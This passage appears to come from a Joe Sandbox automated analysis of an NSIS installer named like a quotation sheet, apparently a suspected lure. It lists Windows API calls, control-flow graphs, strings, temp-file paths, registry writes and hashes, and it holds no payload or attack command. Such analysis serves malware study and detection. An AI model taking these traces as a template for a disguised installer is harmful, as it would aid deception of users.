                                                                                • DestroyWindow.USER32 ref: 00403BE2
                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
                                                                                • GetDlgItem.USER32(?,?), ref: 00403C1F
                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403C3A
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403CE8
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403CF2
                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403E03
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403E24
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
                                                                                • EnableWindow.USER32(?,?), ref: 00403E51
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
                                                                                • EnableMenuItem.USER32(00000000), ref: 00403E6E
                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
                                                                                • lstrlenA.KERNEL32(ldreboligblokkene: Installing,?,ldreboligblokkene: Installing,00422F20), ref: 00403EC2
                                                                                • SetWindowTextA.USER32(?,ldreboligblokkene: Installing), ref: 00403ED1
                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404005
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                • String ID: ldreboligblokkene: Installing
                                                                                • API String ID: 3282139019-2674460088
                                                                                • Opcode ID: 14643a446020e11c7db6c0000c70220a6a3735e766a8ea02bbcbfaa8d9760bc8
                                                                                • Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
                                                                                • Opcode Fuzzy Hash: 14643a446020e11c7db6c0000c70220a6a3735e766a8ea02bbcbfaa8d9760bc8
                                                                                • Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E

                                                                                Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed; edge list follows)
                                                                                control_flow_graph 282 4037e3-4037fb call 4061fc 285 4037fd-40380d call 405dc1 282->285 286 40380f-403840 call 405d4a 282->286 294 403863-40388c call 403aa8 call 4059c3 285->294 291 403842-403853 call 405d4a 286->291 292 403858-40385e lstrcatA 286->292 291->292 292->294 300 403892-403897 294->300 301 403913-40391b call 4059c3 294->301 300->301 302 403899-4038b1 call 405d4a 300->302 307 403929-40394e LoadImageA 301->307 308 40391d-403924 call 405e85 301->308 306 4038b6-4038bd 302->306 306->301 309 4038bf-4038c1 306->309 311 403950-403980 RegisterClassA 307->311 312 4039cf-4039d7 call 40140b 307->312 308->307 316 4038d2-4038de lstrlenA 309->316 317 4038c3-4038d0 call 405900 309->317 313 403986-4039ca SystemParametersInfoA CreateWindowExA 311->313 314 403a9e 311->314 324 4039e1-4039ec call 403aa8 312->324 325 4039d9-4039dc 312->325 313->312 322 403aa0-403aa7 314->322 318 4038e0-4038ee lstrcmpiA 316->318 319 403906-40390e call 4058d5 call 405e63 316->319 317->316 318->319 323 4038f0-4038fa GetFileAttributesA 318->323 319->301 328 403900-403901 call 40591c 323->328 329 4038fc-4038fe 323->329 335 4039f2-403a0c ShowWindow call 40618e 324->335 336 403a75-403a76 call 40514e 324->336 325->322 328->319 329->319 329->328 343 403a18-403a2a GetClassInfoA 335->343 344 403a0e-403a13 call 40618e 335->344 339 403a7b-403a7d 336->339 341 403a97-403a99 call 40140b 339->341 342 403a7f-403a85 339->342 341->314 342->325 345 403a8b-403a92 call 40140b 342->345 348 403a42-403a65 DialogBoxParamA call 40140b 343->348 349 403a2c-403a3c GetClassInfoA RegisterClassA 343->349 344->343 345->325 352 403a6a-403a73 call 403733 348->352 349->348 352->322
                                                                                APIs
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • lstrcatA.KERNEL32(1033,ldreboligblokkene: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ldreboligblokkene: Installing,00000000,00000002,75DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000000), ref: 0040385E
                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer,1033,ldreboligblokkene: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ldreboligblokkene: Installing,00000000,00000002,75DF3410), ref: 004038D3
                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 004038F1
                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer), ref: 0040393A
                                                                                  • Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403977
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 004039FA
                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
                                                                                • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403A3C
                                                                                • DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ldreboligblokkene: Installing
                                                                                • API String ID: 1975747703-1659292090
                                                                                • Opcode ID: 3a9e2f3f5c19ce4247f0d6069029edff0a4c8d27484f6fe16965c6ded75fffd5
                                                                                • Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
                                                                                • Opcode Fuzzy Hash: 3a9e2f3f5c19ce4247f0d6069029edff0a4c8d27484f6fe16965c6ded75fffd5
                                                                                • Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D

                                                                                 Control-flow Graph for the function starting at 402cb6 (rendered graph with executed / not-executed block colouring; node and edge list not reproduced)
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402CCA
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,00000400), ref: 00402CE6
                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00402D2F
                                                                                • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76
                                                                                Strings
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
                                                                                • Null, xrefs: 00402DAF
                                                                                • Inst, xrefs: 00402D9D
                                                                                • C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
                                                                                • C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C
                                                                                • Error launching installer, xrefs: 00402D06
                                                                                • soft, xrefs: 00402DA6
                                                                                • "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe", xrefs: 00402CB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 2803837635-2938456903
                                                                                • Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                                                • Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
                                                                                • Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                                                • Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C

                                                                                 Control-flow Graph for the function starting at 405e85 (rendered graph with executed / not-executed block colouring; node and edge list not reproduced)
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,004050B4,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000), ref: 00405F36
                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405FB1
                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405FC4
                                                                                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 0040600E
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00406019
                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
                                                                                • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,004050B4,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000), ref: 0040608D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 900638850-1772671590
                                                                                • Opcode ID: 74d77ce8cc9b213a62b7930c3515ad840f0844bbbd5d23fc59da94e497b23fcc
                                                                                • Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
                                                                                • Opcode Fuzzy Hash: 74d77ce8cc9b213a62b7930c3515ad840f0844bbbd5d23fc59da94e497b23fcc
                                                                                • Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,00000000,00000000,00000031), ref: 00401790
                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,00000000,00000000,00000031), ref: 004017BA
                                                                                  • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte$C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp$C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll$Call
                                                                                • API String ID: 1941528284-4035100231
                                                                                • Opcode ID: e86eb43d57ba0c2d99ca0b7ff3522d788eea5d214447215224ccb5ba789c1ef7
                                                                                • Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
                                                                                • Opcode Fuzzy Hash: e86eb43d57ba0c2d99ca0b7ff3522d788eea5d214447215224ccb5ba789c1ef7
                                                                                • Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD

                                                                                 Control-flow Graph for the function starting at 40507c (rendered graph with executed / not-executed block colouring; node and edge list not reproduced)
                                                                                APIs
                                                                                • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                • lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll
                                                                                • API String ID: 2531174081-1725250884
                                                                                • Opcode ID: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                                                                • Instruction ID: 0932fbc12a6b25bcac4b474ac1e4098b180b1803f9783341f4c7184ef00e87b2
                                                                                • Opcode Fuzzy Hash: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                                                                • Instruction Fuzzy Hash: 7E218C71E00508BADF119FA5CD84EDFBFA9EF04358F14807AF944A6291C7789A41CFA8

                                                                                 Control-flow Graph for the function starting at 405542 (rendered graph with executed / not-executed block colouring; node and edge list not reproduced)
                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                                                • GetLastError.KERNEL32 ref: 00405599
                                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
                                                                                • GetLastError.KERNEL32 ref: 004055B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                • API String ID: 3449924974-2230009264
                                                                                • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                • Instruction ID: 9e56051543debb7748005a245647f72f9f0c442d478d44b0b7514676580bb89d
                                                                                • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                                                                • Instruction Fuzzy Hash: 2701E571D14259EAEF119BA0CD487EFBBB9EB04354F008176E905B6280D378A604CBAA

                                                                                Control-flow Graph

                                                                                control_flow_graph 645 40618e-4061ae GetSystemDirectoryA 646 4061b0 645->646 647 4061b2-4061b4 645->647 646->647 648 4061c4-4061c6 647->648 649 4061b6-4061be 647->649 651 4061c7-4061f9 wsprintfA LoadLibraryExA 648->651 649->648 650 4061c0-4061c2 649->650 650->651
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
                                                                                • wsprintfA.USER32 ref: 004061DE
                                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%s.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-4240819195
                                                                                • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                • Instruction ID: 17d4186d305cf40b40e49104478d07e272734a7bb4b2e73e379b3f466295ecaf
                                                                                • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                                                                • Instruction Fuzzy Hash: D1F0FC3095410567DB159768DC0DFFF365CBB08304F140176A546E51D2D574E9288B69

                                                                                Control-flow Graph

                                                                                control_flow_graph 652 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 659 4023b0-4023b8 652->659 660 4028cf-4028de 652->660 662 4023c8-4023cb 659->662 663 4023ba-4023c7 call 402a3a lstrlenA 659->663 664 4023db-4023de 662->664 665 4023cd-4023da call 402a1d 662->665 663->662 669 4023e0-4023ea call 402f5c 664->669 670 4023ef-402403 RegSetValueExA 664->670 665->664 669->670 674 402405 670->674 675 402408-4024de RegCloseKey 670->675 674->675 675->660 677 4026a6-4026ad 675->677 677->660
                                                                                APIs
                                                                                • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
